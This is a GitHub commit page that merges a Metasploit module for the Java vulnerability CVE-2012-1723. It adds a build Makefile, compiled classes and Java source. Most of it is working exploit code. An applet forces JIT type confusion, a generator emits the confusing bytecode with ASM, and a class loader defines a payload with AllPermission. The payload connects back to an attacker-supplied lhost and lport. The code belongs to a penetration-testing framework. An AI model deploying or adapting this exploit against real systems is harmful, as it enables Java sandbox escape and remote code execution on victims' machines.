forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge branch 'module-cve-2012-1723' of https://github.com/LittleLight…
…LittleFire/metasploit-framework into LittleLightLittleFire-module-cve-2012-1723
- Loading branch information
Showing
15 changed files
with
628 additions
and
0 deletions.
There are no files selected for viewing
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
JAR = CVE-2012-1723.jar | ||
|
||
ASM = asm-4.0.jar | ||
LIB = lib | ||
BIN = bin | ||
SRC = src | ||
|
||
JAVAC = javac -source 1.5 -target 1.5 | ||
|
||
all: | ||
${JAVAC} -cp ${LIB}/${ASM} src/cve1723/Generator.java -d ${LIB} | ||
java -cp ${LIB}:${LIB}/${ASM} cve1723.Generator | ||
-mkdir ${BIN} | ||
-mkdir ${BIN}/cve1723/ | ||
mv Confuser.class ${BIN}/cve1723/ | ||
find ${SRC} -not -name 'Generator.java' -name '*.java' -type f -print0 | xargs -0 ${JAVAC} -cp ${BIN} -sourcepath {} -d ${BIN} | ||
jar cf ${JAR} -C ${BIN} . | ||
|
||
install: ${JAR} | ||
cp ${JAR} ../../../../data/exploits | ||
|
||
clean: | ||
rm -rf ${BIN} | ||
-rm ${LIB}/cve1723/Generator.class | ||
-rm ${JAR} |
Binary file not shown.
Binary file not shown.
Binary file added
BIN
+1.46 KB
external/source/exploits/CVE-2012-1723/bin/cve1723/ConfusingClassLoader.class
Binary file not shown.
Binary file added
BIN
+1.08 KB
external/source/exploits/CVE-2012-1723/bin/msf/x/PayloadX$StreamConnector.class
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
63 changes: 63 additions & 0 deletions
63
external/source/exploits/CVE-2012-1723/src/cve1723/Attacker.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,63 @@ | ||
package cve1723; | ||
|
||
import java.applet.Applet; | ||
import java.awt.*; | ||
import java.io.*; | ||
import java.net.URL; | ||
import java.nio.ByteBuffer; | ||
import java.nio.IntBuffer; | ||
|
||
/** | ||
* Attacker applet | ||
*/ | ||
public class Attacker extends Applet { | ||
@Override | ||
public void init() { | ||
super.init(); | ||
|
||
final Confuser c = new Confuser(); | ||
for (int i = 0; i < 100000; i++) { | ||
c.confuse(null); | ||
} | ||
|
||
try { | ||
Thread.sleep(100); | ||
} catch (final InterruptedException ie) { | ||
//swallow | ||
} | ||
|
||
try { | ||
final ConfusingClassLoader cl = c.confuse(getClass().getClassLoader()); | ||
final String names[] = { "msf.x.PayloadX", "msf.x.PayloadX$StreamConnector" }; | ||
final String paths[] = { "/msf/x/PayloadX.class", "/msf/x/PayloadX$StreamConnector.class" }; | ||
|
||
final String port = getParameter("lport"); | ||
ConfusingClassLoader.defineAndCreate(cl, names, new byte[][] { loadClass(paths[0]), loadClass(paths[1])}, getParameter("data"), getParameter("jar"), getParameter("lhost"), (port == null ? 4444 : Integer.parseInt(port))); | ||
} catch (final Exception e) { | ||
e.printStackTrace(); | ||
} | ||
} | ||
|
||
private byte[] loadClass(final String name) throws IOException { | ||
final ByteArrayOutputStream os = new ByteArrayOutputStream(); | ||
{ // load the payload class | ||
final InputStream is = getClass().getResourceAsStream(name); | ||
int read; | ||
byte[] buffer = new byte[2048]; | ||
|
||
while ((read = is.read(buffer, 0, buffer.length)) != -1) { | ||
os.write(buffer, 0, read); | ||
} | ||
} | ||
|
||
return os.toByteArray(); | ||
} | ||
|
||
@Override | ||
public void paint(final Graphics g) { | ||
super.paint(g); | ||
|
||
final String tool = System.getSecurityManager() == null ? "null" : System.getSecurityManager().toString(); | ||
g.drawString(tool, 0, 10); | ||
} | ||
} |
40 changes: 40 additions & 0 deletions
40
external/source/exploits/CVE-2012-1723/src/cve1723/ConfusingClassLoader.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,40 @@ | ||
package cve1723; | ||
|
||
import java.lang.reflect.Field; | ||
import java.net.URL; | ||
import java.security.*; | ||
import java.security.cert.*; | ||
import java.security.cert.Certificate; | ||
import java.util.Enumeration; | ||
|
||
/** | ||
* Call the protected method | ||
*/ | ||
public class ConfusingClassLoader extends ClassLoader { | ||
|
||
public static void defineAndCreate(final ConfusingClassLoader cl, final String name[], final byte data[][], final String hexdata, final String jar, final String lhost, final int lport) { | ||
try { | ||
final Permissions p = new Permissions(); | ||
p.add(new AllPermission()); | ||
final ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, new Certificate[0]), p); | ||
|
||
final Class<?> clazz = cl.defineClass(name[0], data[0], 0, data[0].length, pd); | ||
cl.defineClass(name[1], data[1], 0, data[1].length, pd); | ||
|
||
final Field payload_data = clazz.getField("data"); | ||
final Field payload_jar = clazz.getField("jar"); | ||
final Field payload_lhost = clazz.getField("lhost"); | ||
final Field payload_lport = clazz.getField("lport"); | ||
|
||
payload_data.set(null, hexdata); | ||
payload_jar.set(null, jar); | ||
payload_lhost.set(null, lhost); | ||
payload_lport.set(null, lport); | ||
|
||
clazz.newInstance(); | ||
} catch (final Exception e) { | ||
// swallow | ||
e.printStackTrace(); | ||
} | ||
} | ||
} |
132 changes: 132 additions & 0 deletions
132
external/source/exploits/CVE-2012-1723/src/cve1723/Generator.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,132 @@ | ||
package cve1723; | ||
|
||
import org.objectweb.asm.*; | ||
|
||
import java.io.ByteArrayOutputStream; | ||
import java.io.FileOutputStream; | ||
import java.io.IOException; | ||
import java.io.InputStream; | ||
import java.nio.*; | ||
import java.util.Arrays; | ||
|
||
import static org.objectweb.asm.Opcodes.*; | ||
|
||
/** | ||
* CVE-2012-1723 | ||
*/ | ||
public class Generator { | ||
public static byte[] generateConfusion() { | ||
final String STATIC_FIELD_NAME = "staticTypeA"; | ||
final String INSTANCE_FIELD_NAME = "instanceTypeB"; | ||
final String CONFUSE_METHOD_NAME = "confuse"; | ||
final String CONFUSER_CLASS_NAME = "cve1723/Confuser"; | ||
|
||
final String TYPE_A = "Ljava/lang/ClassLoader;"; | ||
final String TYPE_B = "Lcve1723/ConfusingClassLoader;"; | ||
|
||
final ClassWriter cw = new ClassWriter(ClassWriter.COMPUTE_FRAMES | ClassWriter.COMPUTE_MAXS); | ||
|
||
MethodVisitor mv = null; | ||
FieldVisitor fv = null; | ||
|
||
cw.visit(V1_5, ACC_PUBLIC | ACC_SUPER, CONFUSER_CLASS_NAME, null, "java/lang/Object", null); | ||
|
||
// static field of type A (ClassLoader) | ||
{ | ||
fv = cw.visitField(ACC_STATIC, STATIC_FIELD_NAME, TYPE_A, null, null); | ||
fv.visitEnd(); | ||
} | ||
|
||
// one hundred fields of type B (ConfusingClassLoader) | ||
{ | ||
for (int i = 0; i < 100; i++) { | ||
fv = cw.visitField(ACC_PUBLIC, INSTANCE_FIELD_NAME + i, TYPE_B, null, null); | ||
fv.visitEnd(); | ||
} | ||
} | ||
|
||
// constructor | ||
{ | ||
mv = cw.visitMethod(ACC_PUBLIC, "<init>", "()V", null, null); | ||
mv.visitCode(); | ||
mv.visitVarInsn(ALOAD, 0); | ||
mv.visitMethodInsn(INVOKESPECIAL, "java/lang/Object", "<init>", "()V"); | ||
mv.visitInsn(RETURN); | ||
mv.visitMaxs(0, 0); | ||
mv.visitEnd(); | ||
} | ||
|
||
// confuse method | ||
{ | ||
mv = cw.visitMethod(ACC_PUBLIC, CONFUSE_METHOD_NAME, "(" + TYPE_A + ")" + TYPE_B, null, null); | ||
mv.visitCode(); | ||
/* | ||
aload 1 // push parameter onto stack | ||
ifnonnull cont: | ||
aconst_null | ||
areturn // quick return | ||
cont: | ||
getstatic STATIC_FIELD_NAME | ||
pop | ||
aload 0 | ||
aload 1 | ||
putfield STATIC_FIELD_NAME // force this into a non-static field | ||
// find instance field that's not null | ||
aload 0 | ||
getfield INSTANCE_FIELD_NAME_1 | ||
ifnull cont2: | ||
aload 0 | ||
getfield INSTANCE_FIELD_NAME_1 | ||
areturn | ||
cont2: | ||
... | ||
aconst_null | ||
areturn | ||
*/ | ||
|
||
// first part | ||
mv.visitVarInsn(ALOAD, 1); | ||
final Label cont = new Label(); | ||
mv.visitJumpInsn(IFNONNULL, cont); | ||
mv.visitInsn(ACONST_NULL); | ||
mv.visitInsn(ARETURN); | ||
mv.visitLabel(cont); | ||
|
||
// 2nd part | ||
mv.visitFieldInsn(GETSTATIC, CONFUSER_CLASS_NAME, STATIC_FIELD_NAME, TYPE_A); | ||
mv.visitInsn(POP); | ||
mv.visitVarInsn(ALOAD, 0); | ||
mv.visitVarInsn(ALOAD, 1); | ||
mv.visitFieldInsn(PUTFIELD, CONFUSER_CLASS_NAME, STATIC_FIELD_NAME, TYPE_A); | ||
|
||
for (int i = 0; i < 100; i++) { | ||
mv.visitVarInsn(ALOAD, 0); | ||
mv.visitFieldInsn(GETFIELD, CONFUSER_CLASS_NAME, INSTANCE_FIELD_NAME + i, TYPE_B); | ||
final Label contN = new Label(); | ||
mv.visitJumpInsn(IFNULL, contN); | ||
mv.visitVarInsn(ALOAD, 0); | ||
mv.visitFieldInsn(GETFIELD, CONFUSER_CLASS_NAME, INSTANCE_FIELD_NAME + i, TYPE_B); | ||
mv.visitInsn(ARETURN); | ||
mv.visitLabel(contN); | ||
} | ||
|
||
mv.visitInsn(ACONST_NULL); | ||
mv.visitInsn(ARETURN); | ||
|
||
mv.visitMaxs(0, 0); | ||
mv.visitEnd(); | ||
} | ||
cw.visitEnd(); | ||
|
||
return cw.toByteArray(); | ||
} | ||
|
||
public static void main(final String args[]) throws Exception { | ||
final byte data[] = Generator.generateConfusion(); | ||
final FileOutputStream fo = new FileOutputStream("Confuser.class"); | ||
fo.write(data); | ||
fo.close(); | ||
} | ||
} |
Oops, something went wrong.